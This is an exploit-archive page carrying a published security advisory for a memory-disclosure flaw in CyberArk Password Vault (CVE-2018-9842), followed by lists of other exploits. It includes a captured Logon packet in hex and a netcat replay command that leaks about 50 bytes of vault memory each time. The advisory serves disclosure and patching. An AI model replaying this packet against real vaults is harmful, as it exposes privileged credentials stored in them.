Menu

Search for hundreds of thousands of exploits

"CyberArk Password Vault < 9.7 / < 10 - Memory Disclosure"

Author

Exploit author

"RedTeam Pentesting"

Platform

Exploit platform

linux

Release date

Exploit published date

2018-04-09

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
Advisory: CyberArk Password Vault Memory Disclosure

Data in the CyberArk Password Vault may be accessed through a proprietary
network protocol. While answering to a client's logon request, the vault
discloses around 50 bytes of its memory to the client.


Details
=======

Product: CyberArk Password Vault
Affected Versions: < 9.7, < 10
Fixed Versions: 9.7, 10
Vulnerability Type: Information Disclosure
Security Risk: high
Vendor URL: https://www.cyberark.com/
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-015
Advisory Status: published
CVE: CVE-2018-9842
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9842


Introduction
============

"CyberArk Enterprise Password Vault is designed to secure, rotate and
control access to privileged account credentials based on organizational
policies. A flexible architecture allows organizations to start small
and scale to the largest, most complex IT environments. The solution
protects privileged account credentials used to access the vast majority
of systems."
(from the Enterprise Password Vault Data Sheet [1])


More Details
============

The CyberArk Password Vault serves as a database to securely store
credentials. Furthermore, the vault enforces access controls and logs
access to its records. Data stored in the vault may be accessed through
a proprietary network protocol which is usually transmitted over TCP
port 1858. Various clients, such as web applications or command line
tools, are provided by CyberArk to interface with a vault.

The first message a client sends to the vault is a "Logon" command.
Using a network sniffer, such a message was captured:

$ xxd logon.bin
00000000: ffff ffff f700 0000 ffff ffff 3d01 0000  ............=...
00000010: 5061 636c 6953 6372 6970 7455 7365 7200  PacliScriptUser.
00000020: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000030: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000040: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000050: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000060: 0000 0000 0000 0000 0000 0000 0020 2020  .............
00000070: 20ff ffff ff00 0000 0000 0000 0000 0073   ..............s
00000080: 0000 00ce cece ce00 0000 0000 0000 0000  ................
00000090: 0000 0000 0000 0030 3d4c 6f67 6f6e fd31  .......0=Logon.1
000000a0: 3135 3d37 2e32 302e 3930 2e32 38fd 3639  15=7.20.90.28.69
000000b0: 3d50 fd31 3136 3d30 fd31 3030 3dfd 3231  =P.116=0.100=.21
000000c0: 373d 59fd 3231 383d 5041 434c 49fd 3231  7=Y.218=PACLI.21
000000d0: 393d fd33 3137 3d30 fd33 3537 3d30 fd32  9=.317=0.357=0.2
000000e0: 323d 5061 636c 6953 6372 6970 7455 7365  2=PacliScriptUse
000000f0: 72fd 3336 373d 3330 fd00 00              r.367=30...

Starting at offset 0x97, a type of remote procedure call can be
identified. In this case, "Logon" is invoked for the user
"PacliScriptUser". This message does not contain any random,
unpredictable data. Therefore, it may be replayed at will once captured.
This can be accomplished using netcat:

------------------------------------------------------------------------
$ cat logon.bin | nc -v 10.0.0.5 1858
------------------------------------------------------------------------

RedTeam Pentesting discovered that the message sent by the vault in
response to a "Logon" command contains about 50 bytes of the vault's
memory.


Proof of Concept
================

To trigger the vulnerability, a previously captured logon message is
sent to the vault using netcat:

------------------------------------------------------------------------
$ cat logon.bin | nc -v 10.0.0.5 1858 | xxd
Ncat: Version 7.40 ( https://nmap.org/ncat )
Ncat: Connected to 10.0.0.5:1858.
Ncat: 251 bytes sent, 273 bytes received in 0.01 seconds.
00000000: e500 0000 0000 0000 3001 0000 5061 636c  ........0...Pacl
00000010: 6953 6372 6970 7455 7365 7200 0000 0000  iScriptUser.....
00000020: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000030: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000040: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000050: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000060: 0000 0000 0000 0000 0000 0000 001e 0200  ................
00000070: 0078 9c53 6362 0003 7616 0686 ff40 e019  .x.Scb..v....@..
00000080: e2e8 ec6b 6069 eaaa 1052 9498 579c 985c  ...k`i...R..W..\
00000090: 9299 9fa7 e093 9f0e 248b b333 0b0a 5253  ........$..3..RS
000000a0: 14d2 f28b 144a 8b53 8b14 0212 9373 3283  .....J.S.....s2.
000000b0: 938b 320b 4a42 817c 3d85 a0d4 c4e2 fc3c  ..2.JB.|=......<
000000c0: 2b05 a070 6a5e 8942 717e 7276 6a89 4266  +..pj^.Bq~rvj.Bf
000000d0: 3150 20bf 3835 458f 8b61 140c 15c0 08c4  1P .85E..a......
000000e0: 0063 0e25 c06d 6265 7220 3d20 7661 756c  .c.%.mber = vaul
000000f0: 745f 6669 6c65 5f63 6174 6567 6f72 6965  t_file_categorie
00000100: 735f 7265 636f 7264 7300 2968 b8fb aae9  s_records.)h....
00000110: 62
------------------------------------------------------------------------

Starting at offset 0xe0, the vault discloses a total of 49 bytes of its
memory to the client.


Workaround
==========

None


Fix
===

Upgrade CyberArk Password Vault to version 9.7 or 10.


Security Risk
=============

This vulnerability is rated as a high risk. Exploitation only requires
network access to a PrivateArk Password Vault. Although each request
only discloses about 50 bytes of memory, sustained exploitation will
likely reveal sensitive information at some point in time. This
critically undermines the primary purpose of the PrivateArk Password
Vault.


Timeline
========

2017-11-24 Vulnerability identified
2018-01-22 Customer approved disclosure to vendor
2018-02-05 Vendor notified
2018-04-06 CVE number requested
2018-04-07 CVE number assigned
2018-04-09 Advisory released


References
==========

[1] http://lp.cyberark.com/rs/316-CZP-275/images/ds-enterprise-password-vault-11-15-17.pdf


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=============================

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/

-- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-11-27 "libupnp 1.6.18 - Stack-based buffer overflow (DoS)" dos linux "Patrik Lantz"
2020-11-24 "ZeroShell 3.9.0 - 'cgi-bin/kerbynet' Remote Root Command Injection (Metasploit)" webapps linux "Giuseppe Fuggiano"
2020-10-28 "aptdaemon < 1.1.1 - File Existence Disclosure" local linux "Vaisha Bernard"
2020-10-28 "Oracle Business Intelligence Enterprise Edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 - 'getPreviewImage' Directory Traversal/Local File Inclusion" webapps linux "Ivo Palazzolo"
2020-10-28 "PackageKit < 1.1.13 - File Existence Disclosure" local linux "Vaisha Bernard"
2020-10-28 "Blueman < 2.1.4 - Local Privilege Escalation" local linux "Vaisha Bernard"
2020-09-11 "Gnome Fonts Viewer 3.34.0 - Heap Corruption" local linux "Cody Winkler"
2020-07-10 "Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution" remote linux SpicyItalian
2020-07-06 "Grafana 7.0.1 - Denial of Service (PoC)" dos linux mostwanted002
Release Date Title Type Platform Author
2019-01-25 "Cisco RV320 Dual Gigabit WAN VPN Router 1.4.2.15 - Command Injection" webapps hardware "RedTeam Pentesting"
2018-04-09 "CyberArk Password Vault < 9.7 / < 10 - Memory Disclosure" dos linux "RedTeam Pentesting"
2018-04-09 "CyberArk Password Vault Web Access < 9.9.5 / < 9.10 / 10.1 - Remote Code Execution" webapps json "RedTeam Pentesting"
2017-11-03 "Ladon Framework for Python 0.9.40 - XML External Entity Expansion" webapps xml "RedTeam Pentesting"
2017-07-24 "REDDOXX Appliance Build 2032 / 2.0.625 - Remote Command Execution" webapps json "RedTeam Pentesting"
2017-07-24 "REDDOXX Appliance Build 2032 / 2.0.625 - Arbitrary File Disclosure" webapps json "RedTeam Pentesting"
2016-01-07 "AVM FRITZ!Box < 6.30 - Remote Buffer Overflow" remote hardware "RedTeam Pentesting"
2015-06-16 "TYPO3 Extension Akronymmanager 0.5.0 - SQL Injection" webapps php "RedTeam Pentesting"
2015-06-10 "Alcatel-Lucent OmniSwitch - Cross-Site Request Forgery" webapps hardware "RedTeam Pentesting"
2015-02-11 "IBM Endpoint Manager - Persistent Cross-Site Scripting" webapps cgi "RedTeam Pentesting"
2014-12-02 "EntryPass N5200 - Credentials Exposure" webapps hardware "RedTeam Pentesting"
2014-12-02 "TYPO3 Extension ke DomPDF - Remote Code Execution" webapps php "RedTeam Pentesting"
2014-06-27 "Python CGIHTTPServer - Encoded Directory Traversal" webapps multiple "RedTeam Pentesting"
2014-06-27 "Endeca Latitude 2.2.2 - Cross-Site Request Forgery" webapps multiple "RedTeam Pentesting"
2014-06-09 "DevExpress ASPxFileManager 10.2 < 13.2.8 - Directory Traversal" webapps asp "RedTeam Pentesting"
2012-05-02 "PHP-decoda - 'Video Tag' Cross-Site Scripting" webapps php "RedTeam Pentesting"
2011-05-04 "ZyWALL USG Appliance - Multiple Vulnerabilities" remote hardware "RedTeam Pentesting"
2009-12-21 "TLS - Renegotiation" remote multiple "RedTeam Pentesting"
2009-08-10 "Papoo CMS 3.7.3 - (Authenticated) Arbitrary Code Execution" webapps php "RedTeam Pentesting"
2009-05-05 "IceWarp Merak Mail Server 9.4.1 Groupware Component - Multiple SQL Injections" webapps php "RedTeam Pentesting"
2008-03-11 "Mapbender 2.4.4 - 'mapFiler.php' Remote Code Execution" webapps php "RedTeam Pentesting"
2008-03-11 "Mapbender 2.4.4 - 'gaz' SQL Injection" webapps php "RedTeam Pentesting"
2007-07-13 "ActiveWeb Contentserver CMS 5.6.2929 - Client-Side Filtering Bypass" webapps php "RedTeam Pentesting"
2007-07-13 "ActiveWeb Contentserver 5.6.2929 - 'Picture_Real_Edit.asp' SQL Injection" webapps asp "RedTeam Pentesting"
2007-07-13 "contentserver 5.6.2929 - '/errors/transaction.asp?msg' Cross-Site Scripting" webapps asp "RedTeam Pentesting"
2007-07-13 "contentserver 5.6.2929 - '/errors/rights.asp?msg' Cross-Site Scripting" webapps asp "RedTeam Pentesting"
2006-05-22 "Prodder 0.4 - Arbitrary Shell Command Execution" remote linux "RedTeam Pentesting"
2005-02-15 "CitrusDB 0.3.6 - 'uploadcc.php' Arbitrary Database Injection" webapps php "RedTeam Pentesting"
2005-02-15 "CitrusDB 0.3.6 - Arbitrary Local PHP File Inclusion" webapps php "RedTeam Pentesting"
2005-02-15 "CitrusDB 0.3.6 - 'importcc.php' CSV File SQL Injection" webapps php "RedTeam Pentesting"
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.